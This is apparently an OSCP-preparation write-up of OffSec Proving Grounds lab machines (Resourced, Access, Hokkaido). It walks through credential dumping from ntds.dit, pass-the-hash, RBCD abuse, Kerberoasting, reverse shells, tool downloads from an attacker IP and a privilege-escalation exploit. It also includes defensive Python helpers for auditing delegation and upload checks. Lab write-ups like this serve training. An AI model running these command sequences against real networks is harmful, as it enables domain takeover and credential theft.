Lainkusanagi OSCP Like
| Linux | Windows | Windows Active Directory |
|---|---|---|
| ClamAV (Pwned) | Kevin (Pwned) | Access (Pwned) |
| Pelican (Pwned) | Internal (Pwned) | Resourced (Pwned) |
| Payday (Pwned) | Algernon (Pwned) | Nagoya |
| Snookums (Pwned) | Jacko (Pwned) | Hokkaido (Pwned) |
| Bratarina (Pwned) | Craft (Pwned) | Hutch (Pwned) |
| Pebbles (Pwned) | Squid (Pwned) | Vault (Pwned) |
| Nibbles (Pwned) | Nickel (Pwned) | |
| Hetemit (Pwned) | MedJed (Pwned) | |
| ZenPhoto (Pwned) | Billyboss (Pwned) | |
| Nukem (Pwned) | Shenzi (Pwned) | |
| Cockpit (Pwned) | AuthBy (Pwned) | |
| Clue (Pwned) | Slort (Pwned) | |
| Extplorer (Pwned) | Hepet (Pwned) | |
| Postfish (local) | DVR4 (Pwned) | |
| Hawat (Pwned) | Mice (Pwned) | |
| Walla (Pwned) | Monster (Pwned) | |
| PC (Pwned) | Fish (Pwned) | |
| Apex (Pwned) | | |
| Sorcerer (Pwned) | | |
| Sybaris (Pwned) | | |
| Peppo (Pwned) | | |
| Hunit (local) | | |
| Readys (Pwned) | | |
| Astronaut (Pwned) | | |
| Bullybox (Pwned) | | |
| Marketing (local) | | |
| Exfiltrated (Pwned) | | |
| Fanatastic (Pwned) | | |
| QuackerJack (Pwned) | | |
| Wombo (Pwned) | | |
| Flu (Pwned) | | |
| Roquefort (Pwned) | | |
| Levram (Pwned) | | |
| Mzeeav (Pwned) | | |
| LaVita (Pwned) | | |
| Xposedapi (Pwned) | | |
| Zipper (Pwned) | | |
| Ochima (Pwned) | | |
| Fired (Pwned) | | |
| Scrutiny (Pwned) | | |
| SPX (Pwned) | | |
| Vmdak (Pwned) | | |
| Mantis | | |
| BitForge (Pwned) | | |
| WallpaperHub | | |
| Zab | | |
NetSecFocus Trophy Room
| Linux Boxes: | Windows Boxes: | Windows Active Directory Boxes: |
|---|---|---|
| Twiggy (Pwned) | Helpdesk | Access (Pwned) |
| Exfiltrated (Pwned) | Algernon (Pwned) | Heist (Pwned) |
| Pelican (Pwned) | Authby (Pwned) | Vault (Pwned) |
| Astronaut (Pwned) | Craft (Pwned) | Nagoya |
| Blackgate (Pwned) | Hutch (Pwned) | Hokkaido (Pwned) |
| Boolean (Pwned) | Internal (Pwned) | Resourced (Pwned) |
| Clue (Pwned) | Jacko (Pwned) | Hutch (Pwned) |
| Cockpit (Pwned) | Kevin (Pwned) | |
| Codo (Pwned) | Resourced (Pwned) | |
| Crane (Pwned) | Squid (Pwned) | |
| Levram (Pwned) | DVR4 (Pwned) | |
| Extplore (Pwned) | Hepet (Pwned) | |
| Hub (Pwned) | Shenzi (Pwned) | |
| Image (Pwned) | Nickel (Pwned) | |
| law (Pwned) | Slort (Pwned) | |
| Lavita (Pwned) | MedJed (Pwned) | |
| PC (Pwned) | | |
| Fired (Pwned) | | |
| Press (Pwned) | | |
| Scrutiny (Pwned) | | |
| RubyDome (Pwned) | | |
| Zipper (Pwned) | | |
| Flu (Pwned) | | |
| Ochima (Pwned) | | |
| PyLoader (Pwned) | | |
| Plum (Pwned) | | |
| SPX (Pwned) | | |
| Jordak (Pwned) | | |
| BitForge (Pwned) | | |
| Vmdak (Pwned) | | |
Nagoya
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
|---|---|
| 192.168.134.21 | TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 |
Resourced
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
|---|---|
| 192.168.104.175 | TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 |
enum4linux lists the domain users, and the description field of V.Ventz leaks the password HotelCalifornia194!
======================================( Users on 192.168.104.175 )======================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg Name: (null) Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson Name: (null) Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker Name: (null) Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson Name: (null) Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson Name: (null) Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194!
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]
SMB exposes an unusual share, Password Audit: its registry folder holds the SYSTEM and SECURITY hives, and its Active Directory folder holds ntds.dit.
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ nxc smb '192.168.104.175' -u 'V.Ventz' -p 'HotelCalifornia194!' --shares
SMB 192.168.104.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.104.175 445 RESOURCEDC [+] resourced.local\V.Ventz:HotelCalifornia194!
SMB 192.168.104.175 445 RESOURCEDC [*] Enumerated shares
SMB 192.168.104.175 445 RESOURCEDC Share Permissions Remark
SMB 192.168.104.175 445 RESOURCEDC ----- ----------- ------
SMB 192.168.104.175 445 RESOURCEDC ADMIN$ Remote Admin
SMB 192.168.104.175 445 RESOURCEDC C$ Default share
SMB 192.168.104.175 445 RESOURCEDC IPC$ READ Remote IPC
SMB 192.168.104.175 445 RESOURCEDC NETLOGON READ Logon server share
SMB 192.168.104.175 445 RESOURCEDC Password Audit READ
SMB 192.168.104.175 445 RESOURCEDC SYSVOL READ Logon server share
---
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ smbclient //192.168.104.175/Password\ Audit -U V.Ventz
Password for [WORKGROUP\V.Ventz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
Active Directory D 0 Tue Oct 5 04:49:15 2021
registry D 0 Tue Oct 5 04:49:16 2021
7706623 blocks of size 4096. 2718634 blocks available
smb: \> cd registry
smb: \registry\> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
SECURITY A 65536 Mon Sep 27 06:45:20 2021
SYSTEM A 16777216 Mon Sep 27 06:45:20 2021
7706623 blocks of size 4096. 2718634 blocks available
smb: \registry\>
---
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ smbclient //192.168.104.175/Password\ Audit -U V.Ventz
Password for [WORKGROUP\V.Ventz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
Active Directory D 0 Tue Oct 5 04:49:15 2021
registry D 0 Tue Oct 5 04:49:16 2021
7706623 blocks of size 4096. 2718618 blocks available
smb: \> cd "Active Directory"
smb: \Active Directory\> ls
. D 0 Tue Oct 5 04:49:16 2021
.. D 0 Tue Oct 5 04:49:16 2021
ntds.dit A 25165824 Mon Sep 27 07:30:54 2021
ntds.jfm A 16384 Mon Sep 27 07:30:54 2021
7706623 blocks of size 4096. 2718570 blocks available
smb: \Active Directory\>
Run secretsdump against the SYSTEM hive and ntds.dit, then spray the users and hashes with nxc; only one new user, L.Livingstone, has a hash that is still valid.
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
(remaining output omitted)
---
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ nxc smb 192.168.104.175 -u users -H hashes --continue-on-success | grep +
SMB 192.168.104.175 445 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
SMB 192.168.104.175 445 RESOURCEDC [+] resourced.local\V.Ventz:913c144caea1c0a936fd1ccb46929d3c
Initial Access
Log in over WinRM with the L.Livingstone hash just obtained (pass-the-hash).
Proof
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ evil-winrm -u 'L.Livingstone' -H '19a3a7550ce8c505c2d46b5e39d6f808' -i '192.168.104.175'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> cd ../../
*Evil-WinRM* PS C:\Users> tree /f /A
Folder PATH listing
Volume serial number is 5C30-DCD7
C:.
+---Administrator
+---L.Livingstone
| +---Desktop
| | local.txt
| |
| +---Documents
| +---Downloads
| +---Favorites
| +---Links
| +---Music
| +---Pictures
| +---Saved Games
| \---Videos
\---Public
*Evil-WinRM* PS C:\Users>
Privilege Escalation – RBCD attack

The account holds GenericAll over the DC's computer account, which allows Resource-Based Constrained Delegation to be abused.
First add a computer account, ATTACKERSYSTEM$. SAMR is used here because LDAPS has a certificate problem.
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-addcomputer -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host 192.168.182.175 -domain-netbios resourced 'resourced.local'/'L.Livingstone' -hashes ':19a3a7550ce8c505c2d46b5e39d6f808'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.
Configure the RBCD delegation right: modify msDS-AllowedToActOnBehalfOfOtherIdentity on the RESOURCEDC$ computer account so that ATTACKERSYSTEM$ is allowed to perform Kerberos delegation to RESOURCEDC$.
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'RESOURCEDC$' -action 'write' 'resourced.local'/'L.Livingstone' -hashes ':19a3a7550ce8c505c2d46b5e39d6f808' -dc-ip 192.168.182.175
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on RESOURCEDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-537427935-490066102-1511301751-4101)
Using the RBCD mechanism, obtain a service ticket that impersonates administrator.
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-getST -spn 'cifs/ResourceDC.resourced.local' -impersonate 'administrator' 'resourced.local/attackersystem$:Summer2018!' -dc-ip 192.168.182.175
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache
Import the service ticket, and add /etc/hosts entries that point both resourced.local and ResourceDC.resourced.local at the DC's IP.
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ export KRB5CCNAME=$(pwd)/'administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache'
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ klist
Ticket cache: FILE:/home/kali/oscp/pg/Resourced/administrator@cifs_ResourceDC.resourced.local@RESOURCED.LOCAL.ccache
Default principal: administrator@resourced.local
Valid starting Expires Service principal
07/12/2025 05:17:53 07/12/2025 15:17:52 cifs/ResourceDC.resourced.local@RESOURCED.LOCAL
renew until 07/13/2025 05:17:55
┌──(kali㉿kali)-[~/oscp/pg/Resourced]
└─$ impacket-psexec resourced.local/administrator@ResourceDC.resourced.local -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ResourceDC.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file sgFVEzVn.exe
[*] Opening SVCManager on ResourceDC.resourced.local.....
[*] Creating service Eqac on ResourceDC.resourced.local.....
[*] Starting service Eqac.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
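An added audit helper (not part of this write-up or of impacket): decode the raw msDS-AllowedToActOnBehalfOfOtherIdentity bytes read from a computer object and compare the SIDs they grant against an approved list, so that an entry such as the ATTACKERSYSTEM$ SID printed by impacket-rbcd above stands out. The descriptor bytes are constructed inline by build_rbcd_descriptor, which mirrors the self-relative layout impacket-rbcd writes; no LDAP connection is made.

```python
"""Audit msDS-AllowedToActOnBehalfOfOtherIdentity (a self-relative security
descriptor). Listing the ACCESS_ALLOWED SIDs in its DACL shows which accounts
may delegate to the object; anything not on an approved list is suspect.
"""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def sid_to_str(buf, off):
    """Parse a binary SID at buf[off:]; return (string SID, bytes consumed)."""
    rev, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    sid = "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * sub_count


def str_to_sid(sid):
    """Inverse of sid_to_str: 'S-1-5-21-...' -> binary SID."""
    parts = sid.split("-")
    assert parts[0] == "S"
    rev, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([rev, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def allowed_to_act_sids(sd):
    """Return the SIDs of ACCESS_ALLOWED ACEs in the DACL of a self-relative SD.
    An empty attribute means no RBCD is configured (impacket reported exactly
    that before it wrote the new value)."""
    if not sd:
        return []
    # SECURITY_DESCRIPTOR_RELATIVE: Revision, Sbz1, Control, 4 offsets (20 bytes)
    _rev, _sbz1, control, _off_owner, _off_group, _off_sacl, off_dacl = \
        struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2 (8 bytes)
    _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _ace_flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            # ACCESS_ALLOWED_ACE: 4-byte header, 4-byte Mask, then the SID
            sid, _ = sid_to_str(sd, pos + 8)
            sids.append(sid)
        pos += ace_size
    return sids


def unexpected_delegations(sd, approved):
    """SIDs allowed to act on behalf of the object that are not on the approved list."""
    return sorted(set(allowed_to_act_sids(sd)) - set(approved))


def build_rbcd_descriptor(sids):
    """Constructed test input: a minimal self-relative SD with one ACCESS_ALLOWED
    ACE per SID, shaped like the value impacket-rbcd writes."""
    aces = b""
    for s in sids:
        sid_bin = str_to_sid(s)
        ace_size = 4 + 4 + len(sid_bin)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, 0x000F01FF) + sid_bin
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    owner = str_to_sid("S-1-5-32-544")          # BUILTIN\Administrators as owner/group
    header_len = 20
    off_dacl = header_len
    off_owner = header_len + len(acl)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_owner, 0, off_dacl)
    return header + acl + owner


if __name__ == "__main__":
    # The SID impacket-rbcd printed for ATTACKERSYSTEM$ in the session above.
    rogue = "S-1-5-21-537427935-490066102-1511301751-4101"
    sd = build_rbcd_descriptor([rogue])
    print("allowed to act:", allowed_to_act_sids(sd))
    print("unexpected:", unexpected_delegations(sd, approved=[]))
```

In a real audit the bytes come from an LDAP query of each computer object's msDS-AllowedToActOnBehalfOfOtherIdentity; a non-empty value on a domain controller deserves immediate attention.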
Access
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
|---|---|
| 192.168.188.187 | TCP:53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,47001 |
Initial Access – file upload to RCE
Clicking the site's Buy Now button opens a file upload that rejects the php extension. Following https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt, an extension of .php……. bypasses the restriction.
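An added example (not the box's upload code) of why the alt-extension trick works and how an upload validator should be written instead. The weak check models a denylist applied to the name as submitted; windows_stored_name models the Win32 rule that trailing dots and spaces are dropped when the file is created; the allowlist and the name policy in strict_is_allowed are assumptions for the example.

```python
"""Upload-extension checks: a denylist on the submitted name versus a
canonicalise-then-allowlist check. On Windows, "shell.php......." is stored
as "shell.php", so a check that only looks at the submitted name is bypassed.
"""
import posixpath

BLOCKED = {".php", ".phtml", ".phar"}                 # assumed denylist of the weak check
ALLOWED = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}   # assumed allowlist of the fix


def weak_is_allowed(filename):
    """Vulnerable: denylist on the submitted name. For "shell.php......."
    splitext() yields the extension ".", which is not on the denylist."""
    ext = posixpath.splitext(filename)[1].lower()
    return ext not in BLOCKED


def windows_stored_name(filename):
    """Name the Win32 file APIs actually create: trailing dots and spaces are stripped."""
    return filename.rstrip(". ")


def strict_is_allowed(filename):
    """Hardened: canonicalise first (basename, strip trailing dots/spaces), then
    require a single extension from the allowlist and a plain base name."""
    name = windows_stored_name(posixpath.basename(filename.replace("\\", "/")))
    if not name or name.count(".") != 1:             # no double extensions, no bare names
        return False
    base, ext = name.rsplit(".", 1)
    if not base or not base.replace("_", "").replace("-", "").isalnum():
        return False
    return "." + ext.lower() in ALLOWED


if __name__ == "__main__":
    for candidate in ("photo.png", "shell.php", "shell.php.......", "shell.php.png"):
        print("%-18s stored as %-10s weak=%-5s strict=%s" % (
            candidate, windows_stored_name(candidate),
            weak_is_allowed(candidate), strict_is_allowed(candidate)))
```

Server-side, the stored name is what matters: validate the name the filesystem will keep, and serve the upload directory without script execution so a slip in the check does not become code execution.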

┌──(kali㉿kali)-[~/oscp/pg/Access]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 49854
cd ~
PS C:\Users\svc_apache> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\svc_apache>
The svc_apache account obtained so far does not have enough privilege to read local.txt. Analysis in BloodHound ("List all Kerberoastable Accounts") shows that svc_mssql can be targeted.

Check which .NET Framework version the system has:
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name version -EA 0 | Where { $_.PSChildName -Match '^(?!S)\p{L}'} | Select PSChildName, version
Use the matching Rubeus.exe build to Kerberoast:
PS C:\Users\svc_apache> curl.exe 192.168.45.228:8000/Rubeus.exe -o Rubeus.exe
PS C:\Users\svc_apache> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_mssql
[*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName : MSSQLSvc/DC.access.offsec
[*] PwdLastSet : 5/21/2022 5:33:45 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\svc_apache\hashes.kerberoast
[*] Roasted hashes written to : C:\Users\svc_apache\hashes.kerberoast
PS C:\Users\svc_apache> type hashes.kerberoast
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$...[hash truncated]
PS C:\Users\svc_apache>
Cracking the hash gives the svc_mssql password trustno1; RunasCs.exe then launches a reverse shell as svc_mssql.
PS C:\Users\svc_apache> curl.exe 192.168.45.228:8000/RunasCs.exe -o RunasCs.exe
PS C:\Users\svc_apache> .\RunasCs.exe
[-] Not enough arguments. 3 Arguments required. Use --help for additional help.
PS C:\Users\svc_apache> .\RunasCs.exe svc_mssql trustno1 cmd -r 192.168.45.228:8787
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-45f4f$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 1216 created in background.
PS C:\Users\svc_apache>
Proof
┌──(kali㉿kali)-[~/oscp/pg/Access]
└─$ rlwrap nc -lvnp 8787
listening on [any] 8787 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 50076
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\svc_mssql
C:\Windows\system32>type c:\users\svc_mssql\desktop\local.txt
type c:\users\svc_mssql\desktop\local.txt
3a7f47eb0838c8ddfdc5339eade9cb53
Privilege Escalation – SeManageVolumePrivilege
Abuse SeManageVolumePrivilege with SeManageVolumeExploit.exe, following a linked write-up: run the exe first, after which it becomes possible to create tzres.dll in C:\Windows\System32\wbem\; tzres.dll here is a reverse-shell DLL generated with msfvenom.
C:\Windows\Temp>curl.exe 192.168.45.228:8000/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe
curl.exe 192.168.45.228:8000/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 12288 100 12288 0 0 74539 0 --:--:-- --:--:-- --:--:-- 75851
C:\Windows\Temp>.\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 918
DONE
C:\Windows\Temp>cd C:\Windows\System32\wbem\
cd C:\Windows\System32\wbem\
PS C:\Windows\System32\wbem> curl.exe 192.168.45.228:8000/tzres.dll -o tzres.dll
curl.exe 192.168.45.228:8000/tzres.dll -o tzres.dll
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 9216 100 9216 0 0 59921 0 --:--:-- --:--:-- --:--:-- 60235
PS C:\Windows\System32\wbem> systeminfo
systeminfo
ERROR: The remote procedure call failed.
PS C:\Windows\System32\wbem>
Proof
┌──(kali㉿kali)-[~/oscp/pg/Access]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.187] 50285
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\network service
C:\Windows\system32>type c:\users\administrator\desktop\proof.txt
type c:\users\administrator\desktop\proof.txt
6c199b9598708291f3d96acaf7de1a60
C:\Windows\system32>
Hokkaido
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
|---|---|
| 192.168.217.40 | TCP:53,80,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,8530,8531,9389,47001 |
SMB enumeration
Using the assumed-breach credentials info/info, NETLOGON/temp contains password_reset.txt, which reveals the password Start123!
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ smbclient //192.168.217.40/NETLOGON -U info
Password for [WORKGROUP\info]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 25 08:40:08 2023
.. D 0 Sat Nov 25 08:17:33 2023
temp D 0 Wed Dec 6 10:44:26 2023
7699711 blocks of size 4096. 1920233 blocks available
smb: \> cd temp
smb: \temp\> ls
. D 0 Wed Dec 6 10:44:26 2023
.. D 0 Sat Nov 25 08:40:08 2023
password_reset.txt A 27 Sat Nov 25 08:40:29 2023
7699711 blocks of size 4096. 1920233 blocks available
smb: \temp\> more password_reset.txt
---
Initial Password: Start123!
/tmp/smbmore.nhOD14 (END)
Collect the domain users with nxc and password-spray them; this finds discovery:Start123!
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc smb 192.168.217.40 -u info -p info --users-export users
SMB 192.168.217.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.217.40 445 DC [+] hokkaido-aerospace.com\info:info
SMB 192.168.217.40 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.217.40 445 DC Administrator 2023-12-06 15:56:28 0 Built-in account for administering the computer/domain
SMB 192.168.217.40 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 192.168.217.40 445 DC krbtgt 2023-11-25 13:11:55 0 Key Distribution Center Service Account
SMB 192.168.217.40 445 DC Hazel.Green 2023-12-06 16:34:46 0
SMB 192.168.217.40 445 DC Molly.Smith 2023-11-25 13:34:13 0
SMB 192.168.217.40 445 DC Alexandra.Little 2023-11-25 13:34:13 0
SMB 192.168.217.40 445 DC Victor.Kelly 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Catherine.Knight 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Angela.Davies 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Molly.Edwards 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Tracy.Wood 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Lynne.Tyler 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Charlene.Wallace 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Cheryl.Singh 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Sian.Gordon 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Gordon.Brown 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Irene.Dean 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Anthony.Anderson 2023-11-25 13:34:17 0
